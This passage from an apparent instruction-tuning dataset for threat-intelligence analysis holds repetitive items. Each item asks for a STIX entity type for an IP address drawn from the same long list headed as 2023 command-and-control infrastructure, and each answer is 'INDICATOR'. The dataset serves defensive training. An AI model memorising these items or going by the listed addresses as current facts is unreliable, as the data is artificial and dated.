malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n195.133.88.19\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.156.98\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n81.19.140.147\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.223.102.109\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n146.190.127.238\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
